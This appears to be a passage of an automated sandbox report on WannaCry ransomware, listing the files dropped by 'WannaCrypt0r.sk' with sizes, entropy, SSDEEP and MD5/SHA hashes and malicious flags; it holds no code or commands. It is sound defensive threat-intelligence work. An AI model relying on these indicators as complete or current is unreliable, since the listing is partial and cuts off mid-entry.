                                                  MD5:01458964CEF4986DEBF42AF943035EB8
                                                  SHA1:87F76042C2EC1DB94F0F1CB4A096777EFCFA32E8
                                                  SHA-256:E24CE91EC3B691E2769C9DF97B7FC2608C03934FDA5CFE000CCC7CD18F39B728
                                                  SHA-512:6637DDDFF48AB09002C4B641041143EE2002D0C962930E66A1D7BD1915B5A131A5F4FFA9AAA1CEC0FC0E8F466C8C56585B6D9387874493716D4EDBB43F33CB25
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.876329322149963
                                                  Encrypted:false
                                                  SSDEEP:24:bkkIbQ8k1oICwZeLo0/YxqrAWB2M5nB3ZVtMlEgMfioTLvTO0zBoaV3Ckfkt5mur:bkH2KICwiolQAWB2M5BJVYmfiWO0zBo3
                                                  MD5:C18D3E4282D1EAE5099745210978B5F0
                                                  SHA1:C3FBE7556D9EBCB202A71C180FBEDB4862E970A5
                                                  SHA-256:51AD103B5AE50549F4C8E810D64FFAE70048144530628B8EF7DC86F34C8C5F16
                                                  SHA-512:4D2A0DF1D0C116DF28414DC25DE1444B49241FC1C6F130DDDB1250512608364B58C748C5CCF877490DE0E5A001A5897931324DD56CFC6E128FBC52D8C0E91A39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8490804436733015
                                                  Encrypted:false
                                                  SSDEEP:24:bkijrdPDW6uS3J6NUxdYn42kz1syIZAWMYSxfw/w9gWCcrR56GQ2vbeFuQxMdT1F:bkEJ7W6uS3JfvS4n1vsADYSpwI9gWCoz
                                                  MD5:0912848A8EC8E4FCFE23EC0A39A39076
                                                  SHA1:D26D4EF538CA5D418BCB085C79F5DA2B7C122F1E
                                                  SHA-256:4F5FF33C191D2399D77D0F11F314F83E28230A51A143C37A566F1C1E1F3C67DF
                                                  SHA-512:F353CE89AA50A9CF23FC55D81F13277201D3562AE39FC1E968B95FFBA0406EE6850C020B245B068F9E30F9412135A08D04F9FC11F9C01EFECDA6B74BD4807DC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833933403557597
                                                  Encrypted:false
                                                  SSDEEP:24:bkFIMVk4uyJw8PFqwNzCQkfN2POUuDhSVadgLCjII7PXuXZHN0jZGQ/RF:bkFIqk4DL9qwPzPOhhSUd1IIDXu7Mx
                                                  MD5:5F1CDF029ED0D7EF9B00362641F078CD
                                                  SHA1:996C243299659FBBBA80EE85FEDD3DBECEB1223A
                                                  SHA-256:ED0529FD9DC8C0CD489038D42F8F174ADBDACB000DBA6BD4C16FCC016FFF125C
                                                  SHA-512:772AF2D08C1676EFE93736ADAD5FF84E5376B4073539D1EC3BD06EEE652251124F154CDC82A6A1FE69FDA5919C9A0F1E9AE26FFCFBC1B75711F47DBCC7FC4A54
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84403982408391
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPO434FHXO9ucxngY+oNI6t5pT1hbM3L9jeN2fE/mZGh/BAfBLTwa9:bkhPO4GXOccxgHoFx1hob953kh/B20O
                                                  MD5:6D170AC6673840205D713A35FB6EABE1
                                                  SHA1:9DC6E03C127224084797D532AD28EA1FD4E82757
                                                  SHA-256:1CB535883E423103E9F271F7EF3488737E5FC9BC6FF8383E1385C7E202D9BF83
                                                  SHA-512:F88E665DEAB899B348E3F4699623F44F9FC0D47DE2E8339C4FC2FF539BD0E9FA1E4FDC3E90CA30F8C4B3457457F7C02F1204AA93244208F3B009F4AE8EDF6910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83031464283867
                                                  Encrypted:false
                                                  SSDEEP:24:bkS3Ir8eZZihIE4+Us4E0qCz4nzHxtW0XJZ6YMzH4MVyDA34LWhJm4l+7sUMkbCN:bkqPPA4nzHx/D6hzH4O25LAJvl+7sUMx
                                                  MD5:EE06AD80636DC54FA88F36B008391FEA
                                                  SHA1:5AF4D0862BD485C720B9B33B0F71E9E9D98858F3
                                                  SHA-256:BCC0476D3FC829A308BD148E1E752CEEA33A9F63D1FCA16FF4ECBFB3C41B783D
                                                  SHA-512:6913FCBCD8B10A4FA213B1342542B37BF46280DBDA7E9611D20410173B076D88F703A5D14A20D7662628D3C722F44A378923F12C7364CBC241533D473E787971
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848796345452971
                                                  Encrypted:false
                                                  SSDEEP:24:bkGNZsTY6/8HQDoi/gVzpfy6jar9PyvCRYwfpGkKCPjSbtl6oaU5B9F12EGUriT:bkGfsf82gVzNYPyqJfoaPsaYOnP
                                                  MD5:C60E19F38602554FB58E3A0F7F737DFD
                                                  SHA1:ACB275B4EAAA2DBDF74D9AEFE4DDE63EE9D9FDBF
                                                  SHA-256:1917306234433A3C80750C54B4305D3E17209F8FD53681CF24915B19DE515BFB
                                                  SHA-512:628938EE661A72915EC49B382DF85F734BE5B707CA79B6D83795B1B5F6711242ACD0B9A6C332A1CCBF6C577D86E29FF51F2D40A4AADC8DBE2D9311BBE20D409C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.872777853650534
                                                  Encrypted:false
                                                  SSDEEP:24:bk++Cr/L0XbZiKRRG6cux5/SNJUQZ+K5jkgTeOvuSzKvpF2vypJ934Pthwv:bkE/YXbbHGjY2SK5ogTYDj2eJ934Fmv
                                                  MD5:7152C96B696C458BB8CC07C4C139DA7E
                                                  SHA1:B9C9B1B3DA050259CB03670D4DC414C4FE881AC6
                                                  SHA-256:B03574312B8506121FB559636B5EFE09A9B64B08E570D236A16E4EE6422E84F8
                                                  SHA-512:D1E7A8994FB84B84E259BC98C465CC19B565364D958CB5DCA209B0A1EA6C98D5231E447FDBC8ADA9C4F7243D3E005D4492501CA4F0C2BC39E26C3B2ADA5DA555
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.845346345377583
                                                  Encrypted:false
                                                  SSDEEP:24:bk9bnzjfYHiuheh6SQDTu14ea39vbZk9Y5dhs46MkasJzghCDkNQL6qgqJMT6pPI:bkx8iCehaP3eWvV0YVs592iRLBzJM91h
                                                  MD5:8A2B2DF71862270A3DDA218F861309C0
                                                  SHA1:D92E7416D8B15512D0D2EE06A53F70E547C579FE
                                                  SHA-256:9F0694B5BABBBBB0BB1DE10C633540B6FFC36950D8BDF46D6BC062534D7498BB
                                                  SHA-512:0DD4F52924EF57D7F09CAF325F507CFDCCCE55CAA70062E6762A0FC5AC427B2B513328F1B7D2412E23D9AA671A13B8E1EDD32A1E86F5945A9BACFEFACF69C5AB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823861494408535
                                                  Encrypted:false
                                                  SSDEEP:24:bkY84SY4oOchCC2Kq4U3fq1ithBP+UAYCQn1fHfVkSXIlAbA8+qv9KJ7SJix:bkNY4Dch9mByGTP+UA5QfkSqA5z9KJ+w
                                                  MD5:26F1655C95582D20A29121A663F9DB58
                                                  SHA1:797EAD6DAC74C60A8BD204ACD6D537389D932E5B
                                                  SHA-256:2F30EAFC4B411F3939DD860A126C140ABB27568A7B24BB8EA20441404D52D742
                                                  SHA-512:05E9199D2A0FC7187A046CA6A0DABAFD2C8F91FEAEEA0D54E96BD2DA7592C4D70D0D71CF8E0122A5D586D88A36213FB84E14122715F3C592E9C6C20FD9AA509B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854876666404128
                                                  Encrypted:false
                                                  SSDEEP:24:bkym+lkJ9UrwHM0YW99j2XPEmDDb7195S1su6N0haX2obkIiMlMUR:bkz+yzEaM2DasaD/PgCu1hq4RuXR
                                                  MD5:8DA76DECA4032F605A39501B56A97777
                                                  SHA1:4E4461AE4BE7DFF6DA9FB719A97DA45712EF31B1
                                                  SHA-256:8275DCA0C2128624FB855C528B4BF70783EE82BBE1F85001316DD4B5569538D2
                                                  SHA-512:67BBB62E522583A5F6B0DF708359FA27CBBA8608F98E85E7EA7BECB640CC0F10A22E050EC3C58A4208C8E8AE90C0F5303D1BF3FDB9B8EB5970F5828573E44AAF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.831882631044693
                                                  Encrypted:false
                                                  SSDEEP:24:bkY5XxgiD6Ncz+RzkOwTmYES/f8qsjWS3+/JhTote/HhRx64ES3wc+:bkBgIczAkOwynYfnslVte/hRx6ZSQ
                                                  MD5:26D459BA1EE3B9220F4D9632C21793FE
                                                  SHA1:E0465BB3BD6C673E572B8F5C7F1D928B118683DD
                                                  SHA-256:A478958C566E764EFBE6501481A4E82CBAA339F2780312A1F42E5DE747704319
                                                  SHA-512:7E688294CE6E829CBBC7F28DC14FEB56675417C62F7820779F09909FBECD3F919339408DE26B61E8F17489AE659DFE8C13294EF6C40438DD2B3ADC4ECE293B8C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861835322984556
                                                  Encrypted:false
                                                  SSDEEP:24:bkEsKPlDjhCP5sImASdZ+JnptlYwCO24ITUM9/IRF4gI4xJ0ICpxdQYanyvZWaw6:bkEXtnPImAgYbtl2L4IoM9/KF4gI4xJi
                                                  MD5:D7E8D50021019949C55044C0E0E0C8BF
                                                  SHA1:8FD4CF8C1107039791B825BF434B0610A2282B69
                                                  SHA-256:FA14F8519FC7FBE1C5D574DE356D9119F082781143CBF9CA3E9D3FE8A3FD6175
                                                  SHA-512:A730EEBC06CDE8E443DED0562754C6C183A7E4DD2998FB2D30DC0A00C36521AC2D28E6E33CEC995AD0EFF72E3EDB5A735ED178165E4DC2452D4B1B4C11B8C844
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.839722427521709
                                                  Encrypted:false
                                                  SSDEEP:24:bkjzvoE+Bfk3j3hJ1Ak2z+kUZvl0LVe6+w/ft6iNso5zNas:bkjzJ+lsj3hJik2rUZvlMVeO9bso5gs
                                                  MD5:34606F3A41D318DDACF5FAA774E2751F
                                                  SHA1:07E216DCF0829C46B774000D18DB5404CAD51DCF
                                                  SHA-256:AC8CECD1448AC554304A566AFEE89DAF5A2B5EF0A8123F1776A349C54F7B0CD0
                                                  SHA-512:D580836BD02C8E11BFA05720169D64B7EDD6CD2C998612D503BB59C6BB59F42CEC4B49086351949F2774CA64E6E21A4FEA6377A190CEFA3BF925EB41265EBC3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85947636127693
                                                  Encrypted:false
                                                  SSDEEP:24:bko4CzWsS2kNgGlvDnOXwj3pcqyWFGdAZN4YE2ZCBk1Wgdnibjq9Gr8o+AYfcKsy:bkqzzpkWGpDtGa74eCBk1WgdAjqov+A0
                                                  MD5:451571151F76AFFC5C001B67FC3C42A3
                                                  SHA1:6E5D489FA2B80DEC5F6424A1A69CC1E76F12AB9D
                                                  SHA-256:440EF8CAEA4A219FFA10FCC4452D05DCDD6D63FBD986755B0D2DA8C2B945647A
                                                  SHA-512:DA1A95633211C55A03152B770DF72A4AE750A4F6A8E08D3B49B6AFC6B1BE9E055FD300568BE776AC68495DF1F3FE0B54149BBBCA870B3DE67C82E21D884A12CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.837995244631193
                                                  Encrypted:false
                                                  SSDEEP:24:bkU6p2EzABs0bvv2cUYjIvnyHbe5VtcDAGTmmuzyn0hBIazb+GyIy+z8H:bkU6MEOzgVAyRGT90hBIa/+GVy5H
                                                  MD5:B1C00284657B116708C8CF5E77EDA5AE
                                                  SHA1:33477415B3286F0B2ECDA5F1EA3CB327256D1A17
                                                  SHA-256:4D2CBC0960AA419DF398BB3524C1A77A530EEF75A209720BE73649E9820A1F81
                                                  SHA-512:44FBFB0BEF29E3A9F1A30F6FF0E16325604918AACF2E84FAC1C5EAF655EB7BD776D875E10E17317BD1858A84E441D59144DD7FE379E549651741B42806BFB9A4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85512783623806
                                                  Encrypted:false
                                                  SSDEEP:24:bkNx8Hw0Ir5L4ttY8HWiBgSkTHyY/OWq8iYGSUsg25vJLecT0M8t5m2F7XKZdnCI:bkkQ0iLE1HpBgSahwk5vheY0BPmI7T8
                                                  MD5:3D8086BBD173F8231A745F7C2C9C0C90
                                                  SHA1:E0B6F9FA720C866CCF818EC896DCE57A769262F0
                                                  SHA-256:934BEC187C6CB58A61C044D69CC6D36CA7EAA2905711BCEE0FEE7429309E4DD3
                                                  SHA-512:94C8255AEF4DC9C05169AFC4008AED2A595E000E3AB3BDBD454135B47073401AAD0B373C2DEE87B7C48C13148DD4C262AE720C1FBECBE70DB1546066DDCFBE29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857915123985954
                                                  Encrypted:false
                                                  SSDEEP:24:bk0JLdTA6pSYQGJZBq/h7211iIc6j/fXRpEWP+GcYQ8QAGLK:bkcLi6QYtVqZSrfXRpGGcYbIO
                                                  MD5:581ABFAC5CA2CC0DA658625701B59AA0
                                                  SHA1:AD1246C831AE20976F1BB3E5FF794B5C5A31D94E
                                                  SHA-256:55CD03B1A4131DD022774DCEF1450F32DAE1AA0E9E6E24330DD1D24DB2F11515
                                                  SHA-512:F05A551E297ADE8012D3E5916FE308D7C986E8ED259B7720BE947651AA7F1A3819DA1FB72523E815EDAAF2E804B482836AAF4FC55E655038E4185C852074C33D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85417753979318
                                                  Encrypted:false
                                                  SSDEEP:24:bk1P06vx0Hykr/WgeHuxfFykadxzkJlkgR2RbYFeTynNtTUD5GnXIsnroP/kqf0n:bk1P0e0HdWBHm1adlk3dR2hYFKOYlGXZ
                                                  MD5:9DE02CC60589F34A4B96FEFCD9909704
                                                  SHA1:66FC1CE161EB8DCC1954AD149DF3CB3471B6354E
                                                  SHA-256:FAF1DF84986305E9644CC78C56FBEEE75261D737996D1584A5272AFAC966AB44
                                                  SHA-512:79BB02E6F15325F98311655B6E9E711DCAAAD68A0B5B7ED1E263CF0EF08A820F6C33D14170B773D5947B6A4A341BF9BDDAB2CB6D9633D2851EF1B5C4F0651C2A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830720891656247
                                                  Encrypted:false
                                                  SSDEEP:24:bkK2HqT70oYVZz7LsLKWrv0lm1ZbyYYqc94zGcwcDHYiIQ76KsH4okdE3:bkK2HqTAoYVmOWrvjZWfraxp2KDoF3
                                                  MD5:30CFA429B724F2B7A17E4915AA7FE6A2
                                                  SHA1:ABE7695E0E4E7C3D66F0D98073A69296BE6D8A60
                                                  SHA-256:09461963138E6C9693507F856D1F2232FFAC66DABA8755131089C9FAC14C4A69
                                                  SHA-512:40142FEABA30525A9568F52C1228F2A3E7D3D6DBC455976114A377462600039C1D5436BF54B74710641DE9DF6EC46A3D6ED39629DC0371B1BEF3D4065EDB1800
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851181274244945
                                                  Encrypted:false
                                                  SSDEEP:24:bkHvca231YjsDIvaSFS/5WbXpke8O6Pts5bAYBzfmanpoeNhE2q3LE:bkPl02aSU/5yXue8O6PaAYBLmanTNy2F
                                                  MD5:5F3FAE3B5BF3DCFA708D912ABF8A65F6
                                                  SHA1:CC459E124F2DFD4583D9E705BFD3030459A82FB1
                                                  SHA-256:BC1B3544DE3234DE2A3D6E31BEBCA05E526161E42859F4B0CA6E63F6FAA970A9
                                                  SHA-512:516792BD1350494392AD9850DD448DC9439C8007BB345B09A7E2CB20832D35A4DD6128A66FCB324F93D8212439128C48A5AAF4AB00078938022B6160B06DAEC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40984
                                                  Entropy (8bit):7.995961555041992
                                                  Encrypted:true
                                                  SSDEEP:768:R2DHMq1UyyLSuyyYTaN4xAG2SzUh3Dk1iVT2cNI3jZ751SrvKsG+UpOa:Ry+ynuCLAG7zgDkwVq6Il5mKGU8a
                                                  MD5:1ED97896B32C5C409416B7202CFD7F5D
                                                  SHA1:B4F142469B7CD386E93A478C6A69BE72E4D4C660
                                                  SHA-256:90BD07713B1A2F137C6F4FCAE1BEA441272F547E8F02D8541C020A7F7431866E
                                                  SHA-512:99ACA26B05649D41C6D9E55C3F97241D172F700639CCF4B3D52A252D9673061217489F05945FE31FD846D0586A5141370967DA9EA7AF2E7BF57441FF1D7F8767
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):125288
                                                  Entropy (8bit):7.998501210566462
                                                  Encrypted:true
                                                  SSDEEP:3072:gxvn3hCJfILYLKPip9Jcth/l6vBJ9S66svgUnkF/f487+h:gxv3QfS2K6p98AH9SR63klv+h
                                                  MD5:3A22A7250F745E7029FC4557729D2673
                                                  SHA1:8DC231AD5463B486D7D807F194A578156C42F08D
                                                  SHA-256:985E8BBB3A798817B2065AA07F41CCADC642A51F59D85E2CFB98CA98BB380B83
                                                  SHA-512:ED8C5FB6D3B42727BE19711D37FF5D9781C051B4B7E53C0287E6BCFEBD3FD4BDEB01266F07F555B42F9215BFB5024FEE74A1DDF9F0F0E3B78F1418A9C33DEF41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856430237778002
                                                  Encrypted:false
                                                  SSDEEP:24:bkiAAB+k2Ubc0pxPfsishYAFPCpMMZwb2KtjB9TEDUjubz49cZDL0DjjM:bkiAyp2UbhpxXsiqxCphk2QTEIJcJ5
                                                  MD5:4F336418442A64242CF5B8132DBA0CE4
                                                  SHA1:598EB1DF085451B0048E9568D0DDE2AC9D5640D5
                                                  SHA-256:C7B6E058B3F904D7163226603ABD6EA9061F2E1296FE405F8E10798B81CD6AC7
                                                  SHA-512:E0061EBF4A9A902F900FB18AC4234A1CC7AEE6F841ECF869E83DE5A6F5B025B404C33CB1F3B8D0F5A173455BF397DDCAF2E2790CB16D28AE0416DB7A89FF8E8A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.811984123982203
                                                  Encrypted:false
                                                  SSDEEP:24:bkgb8G4xpn9zA200t9gkw4ldRuCBF9YMjJB30ALrbUMldkZUH:bkgb8GcndD0UKSBFK+JZBhgZUH
                                                  MD5:0516F42417A3F04C707ADAC115D2CF00
                                                  SHA1:A2648753C15BDDD23118709F0A98E77709289901
                                                  SHA-256:22106308BA259C60ED8B1740E7C37EA52105D84EF624C32AADD1E6FF91DE4FD1
                                                  SHA-512:A501E083458624AAF15DF7CC4F77EFDD63AF45FA4A4B16CCC2810092F73339327A6A36D5B4EC50510130D787A90D3BA7A1515B2022628E87FF0883826DDF0E72
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.807958225155772
                                                  Encrypted:false
                                                  SSDEEP:24:bkP8tAzxbR0GDwisZvcYFCqTlX3uLTsMHPce6AZfqq2L1dHFaQToGEa8sTGcBObx:bkPWWbRHEl5X3P9iiL1d7ToGYm1mFrYm
                                                  MD5:5990554E5D93E2EFF0010F63A6C14086
                                                  SHA1:29E15061889B84D3DEB0F0D9BD833A4D8C321EAD
                                                  SHA-256:05B9FFFACD13D204A3AF9CCCECA1E3EFCA7CA5714208177880ABFAE7A45E0D37
                                                  SHA-512:6D202CED87AE35540CE3201BC56B637C8914DFA866FB57143A656D716261871AF5A85E977C2EF45D5A298D74F9431C1AD36E4C144A82965DF0FDAF5AC123F40D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838863709126363
                                                  Encrypted:false
                                                  SSDEEP:24:bkVTf9A43k6VFre5gwGAKTuiykkvwXJ3RH95nyI6d8WuZ01ScumJRWXM1+QONvk:bkVTfbVVofKiaWwXT9udtl1EmnIM0fs
                                                  MD5:C2F6D5CF81F0ABE8F428E756F86F8C88
                                                  SHA1:0AC22974AD496109A795DF1E873BCD2B103581CC
                                                  SHA-256:7BFC58D74823893F67449E94F08E51F9FFF3883C0F1630466E4A2456E7726A92
                                                  SHA-512:981F7F35715B2F603FA36F121AF6275D8A78B6F31AF7BCD830E54DC6C583881EDFBDD5E48E65E295C9440A0E4B081E37481A32C21F1E695C2B81BBD2C29DD924
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849975900566908
                                                  Encrypted:false
                                                  SSDEEP:24:bk3HRjpNVkFVQAGBG+eBnY6TPkHo0Kxr36Pkhk8F2T6sMNq1fD+6OajcPWlrG:bk3HpUG3eB9PkIVK8F2skfD+6Oajc+pG
                                                  MD5:6FF350E132C197D96B4366EC38BB6D36
                                                  SHA1:804880245B4A194BFBC341629EB08CAC4260CCAF
                                                  SHA-256:8F8CE9A8B0C444D7CA452F6E5C235AADDA9AB988FB949220FD131B2056EFBF6E
                                                  SHA-512:560E8596410B39697B57145CFFF3D8184E995A9A64F8C9B4ED1F17B673BF52266630BEF74858907E5F803C103983F7A48A4C87B3D4ED48B9DE37516F1EDF3A50
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834222334168714
                                                  Encrypted:false
                                                  SSDEEP:24:bkSnTOXUBJyVzx77mPm3P/DdHwBjNirXoABykIYApQSDjUdrfKQBWnRw1O8:bkS8YJAx77f3P/DdK5iLTB3IYAGSDjUb
                                                  MD5:C9154BF36E9E7894034124BBF7112FF1
                                                  SHA1:4C91FDD1BE911E31974BDB22B37899EBB2D84A6A
                                                  SHA-256:74759CC05AFB8285B3022CAA7C46A9B492EC5DCA8FC4127F3724400140A0BCED
                                                  SHA-512:BB4630FB5412874BF01FC50E4EB1759375A83F34A4816B68036AC744F0444302F0D58E5426D3EFA74EAF6CF3B34E6ED9FD1BCEF067D3235530E278BC57845D89
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8367109529083745
                                                  Encrypted:false
                                                  SSDEEP:24:bkm5hqfyh5CLtcXK0DPPWIwZD2zMq7jWe/sxJIXM3yRgpmjEw1QWR8Ge0XdrUjqq:bkkhqKmLWXKLDZD2Iq2e/sxJnyRgpwrk
                                                  MD5:5CF8BCD8E877DCD18344EE071EFA9988
                                                  SHA1:BE06FABCF53D7EA705E1219D008951F0BEB388D3
                                                  SHA-256:6603DCE04A70E2EF5596987085E637E85B829FCDD371C7E8A6F95E6C4C98BD52
                                                  SHA-512:F3DF8AB413A876BFEE7F5C1FB136D3E9F56762DCBD1E386E5251C24AD0352CB12CDF6BDE4090E6130D73611C1B2FCA340230F81D22B48A2B085788CCED861FF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823267939487966
                                                  Encrypted:false
                                                  SSDEEP:24:bk8zT1/wypS9agmTpMJUfxaZHCSAVKNuqPJSQ7XMNm12QbovcHiUz9R2Us:bk8zptpSELgyxaZfQK8mIg12/vyiM27
                                                  MD5:525A0649FEF34B4F81E6DB06A6FF4CDC
                                                  SHA1:DC187C9457E2ED4B53676F31205FDE169B84D6C4
                                                  SHA-256:65173F594FCDDE2297F5315B9358A6E0B55C6913DCDD489E859D594836E9B769
                                                  SHA-512:3635C9F801AA9F1D5FE8930960896356105D43DC8B9F3D7B12D6AD644CE713B5EB641DB8E458B6335F56D8F8F6E68416360633642320CC5CC2A3163B5EBD084F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8499076220924024
                                                  Encrypted:false
                                                  SSDEEP:24:bkzavLWVlAMaudXjQJDdQtdM/ik6goq9lzucH7I0ZGJlN8Wy3r7IB:bkigKudX8JDKtGieoulzuy7Il8HK
                                                  MD5:6D335E493CF884A70D790D21957D9B4C
                                                  SHA1:6B4D8AA5A3A7D2A833414717D6B0F6FAB0BE03EA
                                                  SHA-256:FEE51911873E925840155B3EA8A7FF35CA273F7BB6C47D8786BDB1E06F52EA27
                                                  SHA-512:9775BEF0D7F2459AD1E4F36D1FBA55E814D0FA1E3B767935C169D169474435C2C1503D03D089C5E6B6D3D9BF9A27EB7312FE8FE2DB20606AC73A0FFDBEE5B16C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310281743865335
                                                  Encrypted:false
                                                  SSDEEP:24:bkzfHAypy1EFokhyB9Fg0+p+srtOxsabWZxHqmbnCRZx4Hn1qZmu:bkzvAUASThy9jsrtOGabWZxHgv4C
                                                  MD5:941586C6E485BD375206922574C513C7
                                                  SHA1:B930B5D9EA2D1705A447714AA17B8C4858EA28DE
                                                  SHA-256:2A5BC380F46EDF84E64EC578474ED3916B0FBC0C59529F850873E5587F576774
                                                  SHA-512:BA3B36B9C17FD2EB45E6006038CA86CE0B6DF0AD4F525DD0CCC72DA82604649950C44D37436F98B0D14342232BFC4B4EDE2A28DC088908201CDE693DC4E3EABC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
